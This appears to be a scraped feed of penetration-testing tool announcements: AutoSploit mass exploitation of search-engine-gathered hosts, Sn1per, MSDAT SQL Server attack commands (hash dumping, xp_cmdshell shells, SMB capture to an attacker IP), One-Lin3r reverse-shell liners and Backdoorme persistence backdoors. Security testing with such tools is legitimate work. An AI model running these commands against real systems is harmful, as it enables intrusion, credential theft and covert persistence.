AutoSploit v2.2 – Automated Mass Exploiter

As the name might suggest AutoSploit attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye. But options to add your custom targets and host lists have been included as well. The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is startedOperational Security ConsiderationReceiving back connections on your local machine might not be the best idea from an OPSEC standpoint. Instead consider running this tool from a VPS that has all the dependencies required, available.The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent.Helpful linksUsageInstallingDependenciesUser Manual Extensive usage breakdownScreenshotsReporting bugs/ideasDevelopment guidelinesShoutoutsDevelopmentDiscord serverREADME translationsInstallationInstalling AutoSploit is very simple, you can find the latest stable release here. You can also download the master branch as a zip or tarball or follow one of the below methods;Cloningsudo -s << EOFgit clone https://github.com/NullArray/Autosploit.gitcd AutoSploitchmod +x install.sh./install.shpython2 autosploit.pyEOFDockersudo -s << EOFgit clone https://github.com/NullArray/AutoSploit.gitcd AutoSploitchmod +x install.sh./installshcd AutoSploit/Dockerdocker network create -d bridge haknetdocker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgresdocker build -t autosploit .docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploitEOFOn any Linux system the following should work;git clone https://github.com/NullArray/AutoSploitcd AutoSploitchmod +x install.sh./install.shIf you want to run AutoSploit on a macOS system, AutoSploit is compatible with macOS, however, you have to be inside a virtual environment for it to run successfully. To do this, do the following;sudo -s << '_EOF'pip2 install virtualenv --usergit clone https://github.com/NullArray/AutoSploit.gitvirtualenv <PATH-TO-YOUR-ENV>source <PATH-TO-YOUR-ENV>/bin/activatecd <PATH-TO-AUTOSPLOIT>pip2 install -r requirements.txtchmod +x install.sh./install.shpython autosploit.py_EOFMore information on running Docker can be found hereUsageStarting the program with python autosploit.py will open an AutoSploit terminal session. The options for which are as follows.1. Usage And Legal2. Gather Hosts3. Custom Hosts4. Add Single Host5. View Gathered Hosts6. Exploit Gathered Hosts99. QuitChoosing option 2 will prompt you for a platform specific search query. Enter IIS or Apache in example and choose a search engine. After doing so the collected hosts will be saved to be used in the Exploit component.As of version 2.0 AutoSploit can be started with a number of command line arguments/flags as well. Type python autosploit.py -h to display all the options available to you. I’ve posted the options below as well for reference.usage: python autosploit.py -[c|z|s|a] -[q] QUERY [-C] WORKSPACE LHOST LPORT [-e] [–whitewash] PATH [–ruby-exec] [–msf-path] PATH [-E] EXPLOIT-FILE-PATH [–rand-agent] [–proxy] PROTO://IP:PORT [-P] AGENToptional arguments: -h, –help show this help message and exitsearch engines: possible search engines to use -c, –censys use censys.io as the search engine to gather hosts -z, –zoomeye use zoomeye.org as the search engine to gather hosts -s, –shodan use shodan.io as the search engine to gather hosts -a, –all search all available search engines to gather hostsrequests: arguments to edit your requests –proxy PROTO://IP:PORT run behind a proxy while performing the searches –random-agent use a random HTTP User-Agent header -P USER-AGENT, –personal-agent USER-AGENT pass a personal User-Agent to use for HTTP requests -q QUERY, –query QUERY pass your search queryexploits: arguments to edit your exploits -E PATH, –exploit-file PATH provide a text file to convert into JSON and save for later use -C WORKSPACE LHOST LPORT, –config WORKSPACE LHOST LPORT set the configuration for MSF (IE -C default 127.0.0.1 8080) -e, –exploit start exploiting the already gathered hostsmisc arguments: arguments that don’t fit anywhere else –ruby-exec if you need to run the Ruby executable with MSF use this –msf-path MSF-PATH pass the path to your framework if it is not in your ENV PATH –whitelist PATH only exploit hosts listed in the whitelist fileIf you want to run AutoSploit on a macOS system, AutoSploit is compatible with macOS, however, you have to be inside a virtual environment for it to run successfully. To do this, do the following;sudo -s << ‘_EOF’ pip2 install virtualenv –usergit clone https://github.com/NullArray/AutoSploit.gitvirtualenv <PATH-TO-YOUR-ENV>source <PATH-TO-YOUR-ENV>/bin/activatecd <PATH-TO-AUTOSPLOIT>pip2 install -r requirements.txtchmod +x install.sh./install.shpython autosploit.py_EOFDependenciesNote: All dependencies should be installed using the above installation method, however, if you find they are not:AutoSploit depends on the following Python2.7 modules.requestspsutilShould you find you do not have these installed get them with pip like so.pip install requests psutilorpip install -r requirements.txtSince the program invokes functionality from the Metasploit Framework you need to have this installed also. Get it from Rapid7 by clicking here.Download AutoSploit v2.2

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZT_17-GzAcc/autosploit-v22-automated-mass-exploiter.html

UPDATED VERSION: RouterSploit 3.3.0

PenTestIT RSS Feed
Since my last update, this router exploitation framework have gone through a lot of updates. This post is about RouterSploit 3.3.0 code named I Know You Were Trouble. We will also discuss changes made to and an earlier version 3.2.0 to maintain a chain with the hopes that I keep a watch on these coolRead more about UPDATED VERSION: RouterSploit 3.3.0
The post UPDATED VERSION: RouterSploit 3.3.0 appeared first on PenTestIT.

Link: http://pentestit.com/updated-version-routersploit-3-3-0/

UPDATED VERSION: AutoSploit 2.2

PenTestIT RSS Feed
It has been some days since there was a lot of hue and cry about AutoSploit and eventually everything subsided. I wrote about it in a post titledAutoSploit = Shodan/Censys/Zoomeye + Metasploit too. Recently, an updated an improved updated version – AutoSploit 2.2 was released. This post will try to describe the changes between theRead more about UPDATED VERSION: AutoSploit 2.2
The post UPDATED VERSION: AutoSploit 2.2 appeared first on PenTestIT.

Link: http://feedproxy.google.com/~r/PenTestIT/~3/1YYxIzm27jk/

Sn1per v5.0 – Automated Pentest Recon Scanner

Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security’s premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.SN1PER PROFESSIONAL FEATURES:Professional reporting interfaceSlideshow for all gathered screenshotsSearchable and sortable DNS, IP and open port databaseCategorized host reportsQuick links to online recon tools and Google hacking queriesPersonalized notes field for each hostDEMO VIDEO:SN1PER COMMUNITY FEATURES: Automatically collects basic recon (ie. whois, ping, DNS, etc.) Automatically launches Google hacking queries against a target domain Automatically enumerates open ports via NMap port scanning Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers Automatically checks for sub-domain hijacking Automatically runs targeted NMap scripts against open ports Automatically runs targeted Metasploit scan and exploit modules Automatically scans all web applications for common vulnerabilities Automatically brute forces ALL open services Automatically test for anonymous FTP access Automatically runs WPScan, Arachni and Nikto for all web services Automatically enumerates NFS shares Automatically test for anonymous LDAP access Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities Automatically enumerate SNMP community strings, services and users Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers Automatically tests for open X11 servers Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds Performs high level enumeration of multiple hosts and subnets Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting Automatically gathers screenshots of all web sites Create individual workspaces to store all scan outputAUTO-PWN:Drupal Drupalgedon2 RCE CVE-2018-7600GPON Router RCE CVE-2018-10561Apache Struts 2 RCE CVE-2017-5638Apache Struts 2 RCE CVE-2017-9805Apache Jakarta RCE CVE-2017-5638Shellshock GNU Bash RCE CVE-2014-6271HeartBleed OpenSSL Detection CVE-2014-0160Default Apache Tomcat Creds CVE-2009-3843MS Windows SMB RCE MS08-067Webmin File Disclosure CVE-2006-3392Anonymous FTP AccessPHPMyAdmin Backdoor RCEPHPMyAdmin Auth BypassJBoss Java De-Serialization RCE’sKALI LINUX INSTALL:./install.shDOCKER INSTALL:Credits: @menzowDocker Install: https://github.com/menzow/sn1per-dockerDocker Build: https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/Example usage:$ docker pull menzo/sn1per-docker$ docker run –rm -ti menzo/sn1per-docker sniper menzo.ioUSAGE:[*] NORMAL MODEsniper -t|–target [*] NORMAL MODE + OSINT + RECONsniper -t|–target <TARGET> -o|–osint -re|–recon[*] STEALTH MODE + OSINT + RECONsniper -t|–target <TARGET> -m|–mode stealth -o|–osint -re|–recon[*] DISCOVER MODEsniper -t|–target <CIDR> -m|–mode discover -w|–workspace <WORSPACE_ALIAS>[*] SCAN ONLY SPECIFIC PORTsniper -t|–target <TARGET> -m port -p|–port <portnum>[*] FULLPORTONLY SCAN MODEsniper -t|–target <TARGET> -fp|–fullportonly[*] PORT SCAN MODEsniper -t|–target <TARGET> -m|–mode port -p|–port <PORT_NUM>[*] WEB MODE – PORT 80 + 443 ONLY!sniper -t|–target <TARGET> -m|–mode web[*] HTTP WEB PORT MODEsniper -t|–target <TARGET> -m|–mode webporthttp -p|–port <port>[*] HTTPS WEB PORT MODEsniper -t|–target <TARGET> -m|–mode webporthttps -p|–port <port>[*] ENABLE BRUTEFORCEsniper -t|–target <TARGET> -b|–bruteforce[*] AIRSTRIKE MODEsniper -f|–file /full/path/to/targets.txt -m|–mode airstrike[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLEDsniper -f–file /full/path/to/targets.txt -m|–mode nuke -w|–workspace <WORKSPACE_ALIAS>[*] ENABLE LOOT IMPORTING INTO METASPLOITsniper -t|–target <TARGET>[*] LOOT REIMPORT FUNCTIONsniper -w <WORKSPACE_ALIAS> –reimport[*] UPDATE SNIPERsniper -u|–updateMODES:NORMAL: Performs basic scan of targets and open ports using both active and passive checks for optimal performance.STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.FULLPORTONLY: Performs a full detailed port scan and saves results to XML.WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.WEBPORTHTTP: Launches a full HTTP web application scan against a specific host and port.WEBPORTHTTPS: Launches a full HTTPS web application scan against a specific host and port.UPDATE: Checks for updates and upgrades all components used by sniper.REIMPORT: Reimport all workspace files into Metasploit and reproduce all reports.RELOAD: Reload the master workspace report.SAMPLE REPORT:https://gist.github.com/1N3/8214ec2da2c91691bcbcDownload Sn1per v5.0

Link: http://feedproxy.google.com/~r/PentestTools/~3/Z_yHqaJ_y1U/sn1per-v50-automated-pentest-recon.html

Dumping Domain Password Hashes

It is very common during penetration tests where domain administrator access has been achieved to extract the password hashes of all the domain users for offline cracking and analysis. These hashes are stored in a database file in the domain controller (NTDS.DIT) with some additional information like group memberships and users. The NTDS.DIT file is […]

Link: https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/

MSDAT – Microsoft SQL Database Attacking Tool

MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.Usage examples of MSDAT:You have a Microsoft database listening remotely and you want to find valid credentials in order to connect to the databaseYou have a valid Microsoft SQL account on a database and you want to escalate your privilegesYou have a valid Microsoft SQL account and you want to execute commands on the operating system hosting this DB (xp_cmdshell)Tested on Microsof SQL database 2005, 2008 and 2012.ChangelogVersion 1.0 (2017/02/15) :first version realeasedFeaturesThanks to MSDAT (Microsoft SQL Database Attacking Tool), you can:get technical information (ex: database version) of a MSSQL database without to be authenticatedsearch MSSQL accounts with a dictionnary attacktest each login as password (authentication required)get a windows shell on the database server withxp_cmdshelldownload files remotely with:OLE Automationbulkinsertopenrowsetupload files on the server with:OLE Automationopenrowsetcapture a SMB authentication thanks to:bulkinsertopenrowsetxp_dirtreexp_fileexistxp-getfiledetailssteal MSSQL hashed password, on an any MSSQL versionscan ports through the database:openrowsetexecute SQL requests on a remote MSSQL server trough the database (target) with:bulkinsertopenrowsetlist files/directories with:xp_subdirsxp_dirtreelist drives/medias with:xp_fixeddrivesxp_availablemediacreate folder with:xp_create_subdirInstallationSome dependancies must be installed in order to run MSDAT.In ubuntu:sudo apt-get install freetds-dev or download freetds on http://www.freetds.org/sudo pip install cython colorlog termcolor pymssql argparsesudo pip install argcomplete && sudo activate-global-python-argcompleteAdd “use ntlmv2 = yes" in your freetds configuration file (ex: /etc/freetds/freetds.conf or /usr/local/etc/freetds.conf). Example:[global] # TDS protocol version tds version = 8.0 use ntlmv2 = yesExamplesModulesYou can list all modules:./msdat.py -hWhen you have chosen a module (example: all), you can use it and you can list all features and options of the module:./msdat.py all -hYou can know if a specific module can be used on a MSSQL server thanks to the –test-module option. This options is implemented in each mdat module.all moduleThe all module allows you to run all modules (depends on options that you have purchased).python msdat.py all -s $SERVERIf you want:to use your own account file for the dictionnary attacktry multiple passwords for a user without ask youto define your own timeout value./msdat.py all -s $SERVER -p $PORT –accounts-file accounts.txt –login-timeout 10 –force-retryIn each module, you can define the charset to use with the –charset option.mssqlinfo moduleTo get technical information about a remote MSSQL server without to be authenticated:./msdat.py mssqlinfo -s $SERVER -p $PORT –get-max-infoThis module uses TDS protocol and SQL browser Server to get information.passwordguesser moduleThis module allows you to search valid credentials :./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –force-retry –search–force-retry option allows to test multiple passwords for each user without ask youYou can specify your own account file with the –accounts-file option:./msdat.py passwordguesser -s $SERVER -p $PORT –search –accounts-file accounts.txt –force-retrypasswordstealer moduleTo dump hashed passwords :./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –dump –save-to-file test.txtThis modules has been tested on SQL Server 2000, 2005, 2008 and 2014.xpcmdshell moduleTo execute system commands thanks to xp_cmdshell (https://msdn.microsoft.com/en-us/library/ms190693.aspx):./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD –shellThis previous command give you an interactive shell on the remote database server.If xp_cmdshell is not enabled, the –enable-xpcmdshell can be used in this module to activate it:./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD –enable-xpcmdshell –disable-xpcmdshell –disable-xpcmdshell –shellThe –enable-xpcmdshell option enables xp_cmdshell if it is not enabled (not enabled by default).The –disable-xpcmdshell option disables xp_cmdshell if this one is enabled.smbauthcapture moduleThanks to this module, you can capture a SMB authentication:./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –capture $MY_IP_ADDRESS –share-name SHARETo capture the SMB authentication, the auxiliary/server/capture/smb (http://www.rapid7.com/db/modules/auxiliary/server/capture/smb) module of metasploit could be used:msf > use auxiliary/server/capture/smbmsf auxiliary(smb) > exploitThe capture command of this module tries to capture a SMB authentication thanks to xp_dirtree, xp_fileexist or xp-getfiledetails procedure.If you want to choose the SMB authentication procedure to capture the authentication:./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD –xp-dirtree-capture 127.0.0.1./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD –xp-fileexist-capture 127.0.0.1./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD –xp-getfiledetails-capture 127.0.0.1You can change the SHARE name with the –share-name option.oleautomation moduleThis module can be used to read/write file in the database server.The following command read the file temp.txt stored in the database server:./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –read-file ‘C:\Users\Administrator\Desktop\temp.txt’To write a string in a file (temp.txt) remotely:./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –write-file ‘C:\Users\Administrator\Desktop\temp.txt’ ‘a\nb\nc\nd\ne\nf’This module can be used to download a file (C:\Users\Administrator\Desktop\temp.txt) stored on the database server:./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –get-file ‘C:\Users\Administrator\Desktop\temp.txt’ temp.txtAlso, you can use this module to upload a file (temp.txt) on the target:./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –put-file temp.txt ‘C:\Users\Administrator\Desktop\temp.txtbulkopen moduleThe module bulkopen can be used :to read/download files stored on a database serverto scan ports through the database serverto execute SQL requests on a remote MSSQL server through the databaseTo read a file stored in the target, the following command can be used:./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –read-file ‘C:\Users\Administrator\Desktop\temp.txt’"The –method option can be used to specify the method to use:bulkinsert (https://msdn.microsoft.com/en-us/library/ms188365.aspx) oropenrowset(https://msdn.microsoft.com/en-us/library/ms190312.aspx)):./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –read-file ‘C:\Users\Administrator\Desktop\temp.txt’ –method openrowsetTo download a file (C:\Users\Administrator\Desktop\temp.txt):` “bash ./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –get-file ‘C:\Users\Administrator\Desktop\temp.txt’ temp.txtThis module can be used to scan ports (1433 and 1434 of 127.0.0.1) through the database server:“`bash./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –scan-ports 127.0.0.1 1433,1434 -vYou can scan a range of ports:./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –scan-ports 127.0.0.1 1433-1438This module can be used to execute SQL requests (ex: select @@ServerName) on a remote database server (ex: $SERVER2) through the database ($SERVER):./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –request-rdb $SERVER2 $PORT $DATABASE $USER $PASSWORD ‘select @@ServerName’xpdirectory moduleThe module xpdirectory can be used:to list:filesdirectoriesdrivesto check if a file existsto create a directoryTo list files in a specific directory:./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –list-files ‘C:\’To list directories in a specific directory:./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –list-dir ‘C:\’To list drives:./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –list-fixed-drives –list-available-mediaTo check if a file exist:./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –file-exists ‘C:\’ –file-exists ‘file.txt’To create a directory:./msdat.py xpdirectory –s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –create-dir ‘C:\temp’search moduleThe module search can be used to search a pattern in column names of tables and views. Usefull to search the pattern %password% in column names for example.To get column names which contains password patterns (ex: passwd, password, motdepasse, clave):./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –pwd-column-names –show-empty-columnsIf you want to see column names which doesn’t contain a data, you should use the option –show-empty-columns.To search a specific pattern in column names of views and tables:./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –pwd-column-names –show-empty-columnsDownload MSDAT

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZIGtMzYR_7Q/msdat-microsoft-sql-database-attacking.html

One-Lin3r v1.1 – Gives You One-Liners That Aids In Penetration Testing Operations

One-Lin3r is simple and light-weight framework inspired by the web-delivery module in Metasploit.It consists of various one-liners that aids in penetration testing operations:Reverser: Give it IP & port and it returns a reverse shell liner ready for copy & paste.Dropper: Give it an uploaded-backdoor URL and it returns a download-&-execute liner ready for copy & paste.Other: Holds liners with the general purpose to help in penetration testing (ex: Mimikatz, Powerup, etc…) on the trending OSes (Windows, Linux, and macOS) “More OSes can be added too".FeaturesSearch for any one-liner in the database by its full name or partially.You can add your own liners by following these steps to create a ".liner" file. Also, you can send it to me directly and it will be added in the framework and credited with your name .Autocomplete any framework command and recommendations in case of typos (in case you love hacking like movies ).Command line arguments can be used to give the framework a resource file to load and execute for automation.The ability to reload the database if you added any liner without restarting the framework.You can add any platform to the payloads database just by making a folder in payloads folder and creating a ".liner" file there.More…The payloads database is not big now because this the first edition but it will get bigger with updates and contributions.ScreenshotsUsageCommandline argumentsusage: one-lin3r [-h] [-r R] [-x X] [-q]optional arguments: -h, –help show this help message and exit -r Execute a resource file (history file). -x Execute a specific command (use ; for multiples). -q Quit mode (no banner).Framework commandsCommand Description——– ————-help/? Show this help menulist/show List payloads you can use in the attack.search Search payloads for a specific oneuse <payload> Use an available payloadinfo <payload> Get information about an available payloadbanner Display bannerreload/refresh Reload the payloads databasecheck Prints the core version and database version then check for them online.history Display command line most important history from the beginningsave_history Save command line history to a fileexit/quit Exit the frameworkInstalling and requirementsTo make the tool work at its best you must have :Python 3.x or 2.x (preferred 3).Linux (Tested on kali rolling), Windows system, mac osx (tested on 10.11)The requirements mentioned in the next few lines.Installing+For windows : (After downloading ZIP and upzip it)python -m pip install ./One-Lin3r-masterone-lin3r -h+For Linux :git clone https://github.com/D4Vinci/One-Lin3r.gitapt-get install libncurses5-devpip install ./One-Lin3rone-lin3r -hUpdating the framework or the databaseOn Linux while outside the directorycd One-Lin3r && git pull && cd ..pip install ./One-Lin3r –upgradeOn Windows if you don’t have git installed, redownload the framework zipped!Download One-Lin3r

Link: http://feedproxy.google.com/~r/PentestTools/~3/elxDfxPSrg8/one-lin3r-v11-gives-you-one-liners-that.html

Metateta – Automated Tool For Scanning And Exploiting Network Protocols Using Metasploit

Metateta Automated Tool For Scanning And Exploiting Network Protocols Using Metasploit For faster pen testing for large networksWhat You Can DoScanning with all metasploit modules for specific network Protocol like smb,smtp,snmpRun all Auxiliary modules against specific network ProtocolRun all Possible Metasploit Exploits for specific network Protocol That’s is not recommended for real pen testingCan Run against one target or network or even text file with targetsUsing example’srun.py -R 192.168.1.15-255 -p smb -x exploit run.py -r 192.168.1.15 -p smtp -x scan run.py -f hosts.txt -p smb -x auxiliaryHossam Mohamed – @wazehellDownload Metateta

Link: http://feedproxy.google.com/~r/PentestTools/~3/JS2U_1rLV1I/metateta-automated-tool-for-scanning.html

Msploitego – Pentesting Suite For Maltego Based On Data In A Metasploit Database

msploitego leverages the data gathered in a Metasploit database by enumerating and creating specific entities for services. Services like samba, smtp, snmp, http have transforms to enumerate even further. Entities can either be loaded from a Metasploit XML file or taken directly from the Postgres msf database.RequirementsPython 2.7Has only been tested on Kali Linuxsoftware installations:Metasploitnmapenum4linuxsmtp-checkniktoInstallationcheckout and update the transform path inside MaltegoIn Maltego import config from msploitego/src/msploitego/resources/maltego/msploitego.mtzGeneral UseUsing exported Metasploit xml filerun a db_nmap scan in metatasploit, or import a previous scanmsf> db_nmap -vvvv -T5 -A -sS -ST -Pnmsf> db_import /path/to/your/nmapfile.xmlexport the database to an xml filemsf> db_export -f xml /path/to/your/output.xmlIn Maltego drag a MetasploitDBXML entity onto the graph.Update the entity with the path to your metasploit database file.run the MetasploitDB transform to enumerate hosts.from there several transforms are available to enumerate services, vulnerabilities stored in the metasploit DBUsing Postgresdrag and drop a Postgresql DB entity onto the canvas, enter DB details.run the Postgresql transforms directly against a running DBNotesInstead of running a nikto scan directly from Maltego, I’ve opted to include a field to for a Nikto XML file. Nikto can take long time to run so best to manage that directly from the os.ScreenshotsTODO’sConnect directly to the postgres database – in progressMuch, much, much more tranforms for actions on generated entities.Download Msploitego

Link: http://feedproxy.google.com/~r/PentestTools/~3/NL3Bxk8kM2s/msploitego-pentesting-suite-for-maltego.html

Backdoorme – Powerful Auto-Backdooring Utility

Tools like metasploit are great for exploiting computers, but what happens after you’ve gained access to a computer? Backdoorme answers that question by unleashing a slew of backdoors to establish persistence over long periods of time.Once an SSH connection has been established with the target, Backdoorme’s strengths can come to fruition. Unfortunately, Backdoorme is not a tool to gain root access – only keep that access once it has been gained.Please only use Backdoorme with explicit permission – please don’t hack without asking.UsageBackdoorme is split into two parts: backdoors and modules.Backdoors are small snippets of code which listen on a port and redirect to an interpreter, like bash. There are many backdoors written in various languages to give variety.Modules make the backdoors more potent by running them more often, for example, every few minutes or whenever the computer boots. This helps to establish persistence.SetupTo start backdoorme, first ensure that you have the required dependencies.For Python 3.5+:$ sudo apt-get install python3 python3-pip python3-tk nmap $ cd backdoorme/$ virtualenv –python=python3.5 env$ source env/bin/activate(env) $ pip install -r requirements.txtFor Python 2.7:$ sudo python dependencies.pyGetting StartedLaunching backdoorme:$ python master.pyTo add a target:>> addtargetTarget Hostname: 10.1.0.2Username: victimPassword: password123 + Target 1 Set!>>BackdoorsTo use a backdoor, simply run the “use" keyword.>> use shell/metasploit + Using current target 1. + Using Metasploit backdoor…(msf) >>From there, you can set options pertinent to the backdoor. Run either "show options" or "help" to see a list of parameters that can be configured. To set an option, simply use the "set" keyword.(msf) >> show optionsBackdoor options:Option Value Description Required—— —– ———– ——–name initd name of the backdoor False…(msf) >> set name apache + name => apache(msf) >> show optionsBackdoor options:Option Value Description Required—— —– ———– ——–name apache name of the backdoor False…As in metasploit, backdoors are organized by category.Auxiliarykeylogger – Adds a keylogger to the system and gives the option to email results back to you.simplehttp – installs python’s SimpleHTTP server on the client.user – adds a new user to the target.web – installs an Apache Server on the client.Escalationsetuid – the SetUID backdoor works by setting the setuid bit on a binary while the user has root acccess, so that when that binary is later run by a user without root access, the binary is executed with root access. By default, this backdoor flips the setuid bit on nano, so that if root access is ever lost, the attacker can SSH back in as an unprivileged user and still be able to run nano (or any chosen binary) as root. (‘nano /etc/shadow’). Note that root access is initially required to deploy this escalation backdoor.shell – the shell backdoor is a privilege escalation backdoor, similar to (but more specific than) it’s SetUID escalation brother. It duplicates the bash shell to a hidden binary, and sets the SUID bit. Note that root access is initially required to deploy this escalation backdoor. To use, while SSHed in as an unprivileged user, simply run ".bash -p", and you will have root access.Shellbash – uses a simple bash script to connect to a specific ip and port combination and pipe the output into bash.bash2 – a slightly different (and more reliable) version of the above bash backdoor which does not prompt for the password on the client-side.sh – Similar to the first bash backdoor, but redirects input to /bin/sh.sh2 – Similar to the second bash backdoor, but redirects input to /bin/sh.metasploit – employs msfvenom to create a reverse_tcp binary on the target, then runs the binary to connect to a meterpreter shell.java – creates a socket connection using libraries from Java and compiles the backdoor on the target.ruby – uses ruby’s libraries to create a connection, then redirects to /bin/bash.netcat – uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell.netcat_traditional – utilizes netcat-traditional’s -e option to create a reverse shell.perl – a script written in perl which redirects output to bash, and renames the process to look less conspicuous.php – runs a php backdoor which sends output to bash. It does not automatically install a web server, but instead uses the web modulepython – uses a short python script to perform commands and send output back to the user.web – ships a web server to the target, then uploads msfvenom’s php reverse_tcp backdoor and connects to the host. Although this is also a php backdoor, it is not the same backdoor as the above php backdoor.Accessremove_ssh – removes the ssh server on the client. Often good to use at the end of a backdoorme session to remove all traces.ssh_key – creates RSA key and copies to target for a passwordless ssh connection.ssh_port – Adds a new port for ssh.Windowswindows – Uses msfvenom to create a windows backdoor.ModulesEvery backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the "add" keyword.(msf) >> add poison + Poison module addedEach module has additional parameters that can be customized, and if "help" is rerun, you can see or set any additional options.(msf) >> help…Poison module options:Option Value Description Required—— —– ———– ——–name ls name of command to poison Falselocation /bin where to put poisoned files into FalseCurrently enabled modules include:PoisonPerforms bin poisoning on the target computer – it compiles an executable to call a system utility and an existing backdoor.For example, if the bin poisoning module is triggered with "ls", it would would compile and move a binary called "ls" that would run both an existing backdoor and the original "ls", thereby tripping a user to run an existing backdoor more frequently.CronAdds an existing backdoor to the root user’s crontab to run with a given frequency.WebSets up a web server and places a web page which triggers the backdoor.Simply visit the site with your listener open and the backdoor will begin.UserAdds a new user to the target.StartupAllows for backdoors to be spawned with the bashrc and init files.WhitelistWhitelists an IP so that only that IP can connect to the backdoor.TargetsBackdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one "current" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: "use metasploit 2" will prepare the metasploit backdoor against the second target. Run "list" to see the list of current targets, whether a connection is open or closed, and what backdoors & modules are available.Download Backdoorme

Link: http://feedproxy.google.com/~r/PentestTools/~3/tBsAiuIMyWY/backdoorme-powerful-auto-backdooring.html